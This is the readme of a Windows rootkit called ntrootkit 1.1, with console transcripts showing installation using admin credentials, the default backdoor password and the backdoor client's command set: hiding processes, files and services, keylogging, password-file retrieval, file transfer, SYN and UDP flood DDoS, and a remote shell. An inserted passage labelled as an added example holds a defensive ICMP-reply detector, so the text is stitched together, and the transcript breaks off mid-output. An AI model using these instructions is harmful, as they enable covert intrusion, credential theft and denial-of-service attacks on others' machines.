📄 en_readme.txt
yyt_hac's ntrootkit 1.1 Readme
The first thing you should know about this rootkit is that the built-in backdoor can communicate with the client in 4 ways (0:Userdefined, 1:Icmp, 2:Udp, 3:Tcp). These are all connectionless, so using a utility like fport.exe will not show a connection since there isn't one. TCP and UDP are the most reliable.
Also of importance is that the default password is yyt_hac. This can and should be changed, but for connecting to the backdoor for the first time it must be used.
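Added example, not from the ntrootkit README or its author: the readme says the ICMP transport defaults to echo-reply packets and opens no connection, so host-side connection listings never show it. The detector below, run over constructed ICMP packet records (the record fields and sample addresses are assumptions), flags echo replies that no echo request from the receiving host solicited, which is the network-side artefact a defender can look for.

```python
# Added example, not ntrootkit code: detect unsolicited ICMP echo replies (the readme's default ICMP transport).
from dataclasses import dataclass
from collections import defaultdict

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8

@dataclass(frozen=True)
class IcmpPacket:
    ts: float        # capture timestamp in seconds
    src: str
    dst: str
    icmp_type: int
    icmp_code: int
    ident: int       # echo identifier
    seq: int         # echo sequence number

def unsolicited_echo_replies(packets, window=5.0):
    """Replies with no matching request (reverse direction, same id/seq) within `window` seconds."""
    pending = {}    # (requester, target, ident, seq) -> request timestamp
    flagged = []
    for p in sorted(packets, key=lambda p: p.ts):
        if p.icmp_type == ICMP_ECHO_REQUEST:
            pending[(p.src, p.dst, p.ident, p.seq)] = p.ts
        elif p.icmp_type == ICMP_ECHO_REPLY:
            sent = pending.pop((p.dst, p.src, p.ident, p.seq), None)
            if sent is None or p.ts - sent > window:
                flagged.append(p)
    return flagged

def replies_per_peer(flagged):
    """Count unsolicited replies per (src, dst); a sustained stream, not a stray packet, is the signal."""
    counts = defaultdict(int)
    for p in flagged:
        counts[(p.src, p.dst)] += 1
    return dict(counts)

# Constructed sample: one normal ping exchange, then a reply stream that nothing requested.
SAMPLE = [
    IcmpPacket(0.00, "10.0.0.5", "10.0.0.9", ICMP_ECHO_REQUEST, 0, 0x1234, 1),
    IcmpPacket(0.01, "10.0.0.9", "10.0.0.5", ICMP_ECHO_REPLY, 0, 0x1234, 1),
    IcmpPacket(1.00, "10.0.0.7", "10.0.0.9", ICMP_ECHO_REPLY, 0, 0xBEEF, 1),
    IcmpPacket(1.20, "10.0.0.7", "10.0.0.9", ICMP_ECHO_REPLY, 0, 0xBEEF, 2),
    IcmpPacket(1.40, "10.0.0.9", "10.0.0.7", ICMP_ECHO_REPLY, 0, 0xBEEF, 3),
]

if __name__ == "__main__":
    hits = unsolicited_echo_replies(SAMPLE)
    for p in hits:
        print(f"{p.ts:5.2f} {p.src} -> {p.dst} unsolicited echo reply id={p.ident:#x} seq={p.seq}")
    print(replies_per_peer(hits))
```

The same bookkeeping applies to the UDP and TCP modes in spirit: packets to the chosen port with no corresponding socket or handshake on the host are the thing to correlate against a capture.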
-Local Installation and Commandline Options
C:\WINNT\system32>ntrootkit -h
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Usage:ntrootkit \\ip -u username -p password
ip the computer you want to install ntrootkit on
-u [username] admin account on remote computer
-p [password] admin password on remote computer
Usage:ntrootkit [-v/-m/-u [password]/-i [password]]
-v show the ntrootkit version that is installed
-u [password] uninstall the ntrootkit
-i [password] update the ntrootkit, the new version will be run after reboot
-m show the work mode of the ntrootkit
-m [workmode] set the workmore of the rootkit (0=sniffer, 1=driver)
C:\WINNT>ntrootkit //local install, run without any options
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
The Ntrootkit is installed and started successfully!
C:\WINNT>ntrootkit -m
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The ntrootkit is using windows 2000 sniffer mode to recv packet
//This mode is not very stable, driver mode is highly recommended
C:\WINNT\>ntrootkit -v
ntrootkit -v
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The Version of Ntrootkit that is installed is 1.1
C:\WINNT\system32>ntrootkit -i [password] //update rootkit
ntrootkit -i
yyt_hac
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Please enter you password:
Please wait a minute.....
Update successfully,the new version very runs after system reboots!
-Remote Installation
F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Connecting to remote computer...ok
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
Disconnecting...ok
The Ntrootkit is installed and started successfully!
-Backdoor
L:\c\rootkit\44\RTCLIENT\Release>rtclient
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command]
destip-------------The computer you want to connect
password-----------The ntrootkit's password
proto--------------The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp,3:tcp)
port---------------The dest udp or tcp port which send packet to (default is 445)
MTU----------------The MAX packet size the ntrootkit will use to send packet(if not provided ,the program will get it automatically )
icmp_type----------The icmp packet type which send to server,default is ICMP_ECHO REPLY
icmp_code----------The icmp packet code which send to server,default is 0
Command------------The command which you want the server to do
The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]
DDos_Destip--------The computer you want to DDos
DDos_Destport------The Destport you want to DDos (default is 445)
DDos_type----------The DDos type you want to use (0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0)
DDos_seconds-------The seconds you want to DDos the dest (default is 150s)
DDos_ProcCount-----The process count which the server use to ddos (default is 10)
//the only required commandline options are destip and password; the others have default values
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3
It is yyt_hac's ntrootkit client 1.0
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Time out,Please make sure the target is up and try again
//if the default port of 445 does not work, try another with the -o option
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command
list
CMD>?
********yyt_hac's ntrootkit Server Command List********
?-------------------------------Show this list
HideFileDir [FileName or DIR]----------------------Hide the file or directory
HideProcId [pid]----------------Hide process with the id
HideProcName [procname]---------Hide process with the process name
HideKey [KeyName]---------------Hide a registry key
HideValue [ValueName]-----------Hide a registry value
HideUser [UserName]-------------Hide a User
HideServ [ServiceName]----------Hide a Service
ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden before
ShowProcId pid------------------UnHide the process that been hidden before with the id
ShowProcName procname-----------UnHide the process that been hidden before with the process name
ShowKey KeyName-----------------UnHide the registry key
ShowValue ValueName-------------UnHide the registry value
ShowUser UserName---------------UnHide the user that been hidden before
ShowServ ServiceName------------UnHide the service that been hidden before
Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
KeyLogOn------------------------------Start key log
KeyLogOff-----------------------------Stop key log
DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos the destip
SDDOS---------------------------------Stop DDos
GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer
DelPwd--------------------------------Del the ntrootkit keylog password file
Ps------------------------------------Show all processes on remote machine
Kill pid------------------------------Kill the process with the id or name
RTVer---------------------------------Show Ntrootkit server version and author info
SetPass [NewPassword]-----------------Change or show the connection password
Reboot--------------------------------Reboot the targer computer
OpenShell-----------------------------Open a command shell
Exit----------------------------------Exit the shell or rootkit
//notes
HideKey, HideServ, etc.: call any Hide* command without a parameter to see a list of the currently hidden items
HideUser [UserName]-------------------Not implemented yet
HideServ [ServiceName]----------------Hide a service by its service name, NOT its display name
CMD>ps //list processes, including hidden
ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
224 WINLOGON.EXE
252 services.exe
264 LSASS.EXE
452 svchost.exe
508 spoolsv.exe
536 NETDDE.EXE
1364 ntfrs.exe
1392 NTservice.exe
1404 NTweb.exe
1412 CCP.exe
1900 termsrv.exe
1952 winmgmt.exe
1968 winvnc.exe
1992 dns.exe
2032 inetinfo.exe
2076 ismserv.exe
2512 explorer.exe
2720 internat.exe
2728 sqlmangr.exe
2652 plog.exe
2624 SysArchive.exe
2752 svchost.exe
3160 DWRCS.EXE
11544 SpntSvc.exe
23028 CCProxy.exe
27096 mshta.exe
27980 PSEXESVC.EXE
28008 cmd.exe
27872 rtkit.exe
CMD>kill 27096
process is been killed !
CMD>rtver
The ntrootkit version is 1.1,
welcome to http://www.yythac.com
CMD>hideprocid //list hidden processes
The Hide ProcId:
CMD>keylogon //start keylogger
Key log Start successfully
CMD>ddos 202.202.23.3.14 139 2 30 //DOS 202.23.3.14 with a syn flood on port 139 for 30sec
DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos
process count:10,
DDos started successfully!
CMD>ddos 202.23.3.14 139 2 30 //can only do one dos at a time
DDos already started
CMD>sddos //stop running dos attack
Stop DDos sucessfully!
CMD>openshell //windows commandshell
Microsoft Windows 2000 [